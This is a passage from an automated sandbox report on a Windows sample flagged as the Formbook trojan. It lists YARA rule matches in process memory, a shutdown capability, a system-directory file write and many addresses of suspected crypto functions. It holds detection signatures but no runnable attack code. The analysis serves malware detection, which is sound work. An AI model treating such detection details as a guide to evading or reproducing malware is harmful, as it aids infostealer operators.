Source: 00000009.00000002.6797910389.0000000000CA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: Lakeringernes (1).exe PID: 384, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: wscript.exe PID: 3316, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 2_2_004030D9 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 2_2_004030D9
Creates files inside the system directory
Source: C:\Users\user\Desktop\Lakeringernes (1).exe File created: C:\Windows\resources\0409 Jump to behavior
Detected potential crypto function
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 2_2_0040488F 2_2_0040488F
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 2_2_00406344 2_2_00406344
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 2_2_032D0B67 2_2_032D0B67
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 2_2_032D4D36 2_2_032D4D36
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 2_2_032B072C 2_2_032B072C
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 2_2_032B0727 2_2_032B0727
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 2_2_032B073B 2_2_032B073B
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 2_2_032D3F37 2_2_032D3F37
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 2_2_032B0335 2_2_032B0335
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 2_2_032B7B1C 2_2_032B7B1C
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 2_2_032B9777 2_2_032B9777
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 2_2_032B0B4F 2_2_032B0B4F
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 2_2_032B03AF 2_2_032B03AF
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 2_2_032B07AE 2_2_032B07AE
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 2_2_032B0B9F 2_2_032B0B9F
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 2_2_032B0F9D 2_2_032B0F9D
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 2_2_032D3BDC 2_2_032D3BDC
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 2_2_032B063C 2_2_032B063C
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 2_2_032B0E01 2_2_032B0E01
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 2_2_032B0A19 2_2_032B0A19
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 2_2_032B0E67 2_2_032B0E67
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 2_2_032B0A77 2_2_032B0A77
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 2_2_032B7E4A 2_2_032B7E4A
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 2_2_032B0243 2_2_032B0243
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 2_2_032B025C 2_2_032B025C
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 2_2_032D22A4 2_2_032D22A4
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 2_2_032B06BA 2_2_032B06BA
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 2_2_032B02B9 2_2_032B02B9
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 2_2_032B06BE 2_2_032B06BE
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 2_2_032B06BC 2_2_032B06BC
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 2_2_032B06B5 2_2_032B06B5
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 2_2_032D2A8F 2_2_032D2A8F
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 2_2_032BCE8C 2_2_032BCE8C
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 2_2_032D26E4 2_2_032D26E4
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 2_2_032B0AE1 2_2_032B0AE1
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 2_2_032B06CB 2_2_032B06CB
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 2_2_032B0ECB 2_2_032B0ECB
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 2_2_032B06C9 2_2_032B06C9
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 2_2_032B06CE 2_2_032B06CE
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 2_2_032B06C2 2_2_032B06C2
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 2_2_032B06C0 2_2_032B06C0
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 2_2_032B06C7 2_2_032B06C7
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 2_2_032B06C5 2_2_032B06C5
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 2_2_032B06D9 2_2_032B06D9
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 2_2_032B06DF 2_2_032B06DF
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 2_2_032BC6DE 2_2_032BC6DE
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 2_2_032B06DD 2_2_032B06DD
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 2_2_032B06D2 2_2_032B06D2
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 2_2_032B06D0 2_2_032B06D0
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 2_2_032D56D1 2_2_032D56D1
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 2_2_032B092D 2_2_032B092D
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 2_2_032B7D1D 2_2_032B7D1D
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 2_2_032B011C 2_2_032B011C
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 2_2_032B017E 2_2_032B017E
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 2_2_032B8175 2_2_032B8175
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 2_2_032B0559 2_2_032B0559
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 2_2_032D0D5E 2_2_032D0D5E
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 2_2_032B81B9 2_2_032B81B9
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 2_2_032B099C 2_2_032B099C
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 2_2_032D11CF 2_2_032D11CF
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 2_2_032B05CF 2_2_032B05CF
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 2_2_032B0429 2_2_032B0429
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 2_2_032D0835 2_2_032D0835
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 2_2_032B8C34 2_2_032B8C34
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 2_2_032B000A 2_2_032B000A
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 2_2_032D5008 2_2_032D5008
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 2_2_032B880E 2_2_032B880E
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 2_2_032B0002 2_2_032B0002
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 2_2_032B0C18 2_2_032B0C18
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 2_2_032B006B 2_2_032B006B
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 2_2_032B0C6E 2_2_032B0C6E
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 2_2_032B1074 2_2_032B1074
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 2_2_032B7858 2_2_032B7858
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 2_2_032B345F 2_2_032B345F
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 2_2_032B08AD 2_2_032B08AD
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 2_2_032B94A3 2_2_032B94A3
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 2_2_032D288A 2_2_032D288A
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 2_2_032B0491 2_2_032B0491
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 2_2_032B04ED 2_2_032B04ED
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 2_2_032D30F5 2_2_032D30F5
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 2_2_032B78F0 2_2_032B78F0
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 2_2_032B78C9 2_2_032B78C9
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 2_2_032B00C1 2_2_032B00C1
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 2_2_032B94DE 2_2_032B94DE
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D862DB0 6_2_1D862DB0
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D859DD0 6_2_1D859DD0
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8EFDF4 6_2_1D8EFDF4
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D84AD00 6_2_1D84AD00
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D90FD27 6_2_1D90FD27
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D907D4C 6_2_1D907D4C
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D850D69 6_2_1D850D69
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8E9C98 6_2_1D8E9C98
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D868CDF 6_2_1D868CDF
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8D7CE8 6_2_1D8D7CE8
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D86FCE0 6_2_1D86FCE0
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D91ACEB 6_2_1D91ACEB
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D840C12 6_2_1D840C12
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D85AC20 6_2_1D85AC20
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8CEC20 6_2_1D8CEC20
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8FEC4C 6_2_1D8FEC4C
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D853C60 6_2_1D853C60
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D90EC60 6_2_1D90EC60
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D906C69 6_2_1D906C69
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D90EFBF 6_2_1D90EFBF
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D901FC6 6_2_1D901FC6
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D856FE0 6_2_1D856FE0
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D85CF00 6_2_1D85CF00
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8CFF40 6_2_1D8CFF40
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D90FF63 6_2_1D90FF63
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D851EB2 6_2_1D851EB2
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D900EAD 6_2_1D900EAD
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D909ED2 6_2_1D909ED2
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D842EE8 6_2_1D842EE8
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D892E48 6_2_1D892E48
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D870E50 6_2_1D870E50
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8F0E6D 6_2_1D8F0E6D
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D84E9A0 6_2_1D84E9A0
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D90E9A6 6_2_1D90E9A6
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8959C0 6_2_1D8959C0
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D866882 6_2_1D866882
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8C98B2 6_2_1D8C98B2
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8528C0 6_2_1D8528C0
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D9018DA 6_2_1D9018DA
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D9078F3 6_2_1D9078F3
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D853800 6_2_1D853800
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D87E810 6_2_1D87E810
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8F0835 6_2_1D8F0835
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D90F872 6_2_1D90F872
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D836868 6_2_1D836868
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D859870 6_2_1D859870
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D86B870 6_2_1D86B870
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8C5870 6_2_1D8C5870
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8C4BC0 6_2_1D8C4BC0
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D88DB19 6_2_1D88DB19
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D850B10 6_2_1D850B10
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D90FB2E 6_2_1D90FB2E
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D90FA89 6_2_1D90FA89
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D86FAA0 6_2_1D86FAA0
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D90CA13 6_2_1D90CA13
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D90EA5B 6_2_1D90EA5B
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D9075C6 6_2_1D9075C6
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D90F5C9 6_2_1D90F5C9
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D91A526 6_2_1D91A526
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8BD480 6_2_1D8BD480
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D850445 6_2_1D850445
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D906757 6_2_1D906757
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D852760 6_2_1D852760
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D85A760 6_2_1D85A760
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D850680 6_2_1D850680
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D90A6C0 6_2_1D90A6C0
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8C36EC 6_2_1D8C36EC
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D84C6E0 6_2_1D84C6E0
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D90F6F6 6_2_1D90F6F6
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D86C600 6_2_1D86C600
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8ED62C 6_2_1D8ED62C
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8FD646 6_2_1D8FD646
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D874670 6_2_1D874670
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8551C0 6_2_1D8551C0
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D86B1E0 6_2_1D86B1E0
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D83F113 6_2_1D83F113
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D91010E 6_2_1D91010E
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8ED130 6_2_1D8ED130
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D89717A 6_2_1D89717A
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D88508C 6_2_1D88508C
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8400A0 6_2_1D8400A0
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D85B0D0 6_2_1D85B0D0
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D9070F1 6_2_1D9070F1
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D8FE076 6_2_1D8FE076
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D841380 6_2_1D841380
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D85E310 6_2_1D85E310
Source: C:\Users\user\Desktop\Lakeringernes (1).exe Code function: 6_2_1D90F330 6_2_1D90F330
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04A9D480 9_2_04A9D480
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04A30445 9_2_04A30445
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04AEF5C9 9_2_04AEF5C9
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04AE75C6 9_2_04AE75C6
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04AFA526 9_2_04AFA526
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04A30680 9_2_04A30680
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04A2C6E0 9_2_04A2C6E0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04AA36EC 9_2_04AA36EC
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04AEF6F6 9_2_04AEF6F6
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04AEA6C0 9_2_04AEA6C0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04ACD62C 9_2_04ACD62C
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04A4C600 9_2_04A4C600
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04A54670 9_2_04A54670
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04ADD646 9_2_04ADD646
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04A32760 9_2_04A32760
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04A3A760 9_2_04A3A760
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04AE6757 9_2_04AE6757
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04A200A0 9_2_04A200A0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04A6508C 9_2_04A6508C
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04AE70F1 9_2_04AE70F1
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04A3B0D0 9_2_04A3B0D0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04ADE076 9_2_04ADE076
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04A4B1E0 9_2_04A4B1E0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04A351C0 9_2_04A351C0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04ACD130 9_2_04ACD130
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04AF010E 9_2_04AF010E
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04A1F113 9_2_04A1F113
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04A7717A 9_2_04A7717A
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04A1D2EC 9_2_04A1D2EC
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_049F2245 9_2_049F2245
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04AE124C 9_2_04AE124C
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04A21380 9_2_04A21380
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04AEF330 9_2_04AEF330
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04A3E310 9_2_04A3E310
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04AC9C98 9_2_04AC9C98
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04AB7CE8 9_2_04AB7CE8
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04A4FCE0 9_2_04A4FCE0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04AFACEB 9_2_04AFACEB
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04A48CDF 9_2_04A48CDF
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04A3AC20 9_2_04A3AC20
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04A20C12 9_2_04A20C12
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04A33C60 9_2_04A33C60
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04AE6C69 9_2_04AE6C69
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04AEEC60 9_2_04AEEC60
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04ADEC4C 9_2_04ADEC4C
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04A42DB0 9_2_04A42DB0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04ACFDF4 9_2_04ACFDF4
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04A39DD0 9_2_04A39DD0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04AEFD27 9_2_04AEFD27
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04A2AD00 9_2_04A2AD00
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04A30D69 9_2_04A30D69
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04AE7D4C 9_2_04AE7D4C
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04AE0EAD 9_2_04AE0EAD
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04A31EB2 9_2_04A31EB2
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04A22EE8 9_2_04A22EE8
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04AE9ED2 9_2_04AE9ED2
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04AD0E6D 9_2_04AD0E6D
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04A72E48 9_2_04A72E48
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04A50E50 9_2_04A50E50
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04AEEFBF 9_2_04AEEFBF
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04A36FE0 9_2_04A36FE0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04AE1FC6 9_2_04AE1FC6
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04A3CF00 9_2_04A3CF00
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04AEFF63 9_2_04AEFF63
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04AA98B2 9_2_04AA98B2
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04A46882 9_2_04A46882
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04AE78F3 9_2_04AE78F3
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04A328C0 9_2_04A328C0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04AE18DA 9_2_04AE18DA
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04AD0835 9_2_04AD0835
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04A33800 9_2_04A33800
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04A5E810 9_2_04A5E810
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04A16868 9_2_04A16868
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04A39870 9_2_04A39870
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04A4B870 9_2_04A4B870
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04AA5870 9_2_04AA5870
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04AEF872 9_2_04AEF872
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04A2E9A0 9_2_04A2E9A0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04AEE9A6 9_2_04AEE9A6
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04A759C0 9_2_04A759C0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_049F99E8 9_2_049F99E8
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04A4FAA0 9_2_04A4FAA0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04AEFA89 9_2_04AEFA89
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04AECA13 9_2_04AECA13
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04AEEA5B 9_2_04AEEA5B
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04AA4BC0 9_2_04AA4BC0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04AEFB2E 9_2_04AEFB2E
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04A30B10 9_2_04A30B10
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_04A6DB19 9_2_04A6DB19
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_0060E730 9_2_0060E730
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_00608880 9_2_00608880
Source: C:\Windows\SysWOW64\wscript.exe Code function: 9_2_00620CB8 9_2_00620CB8
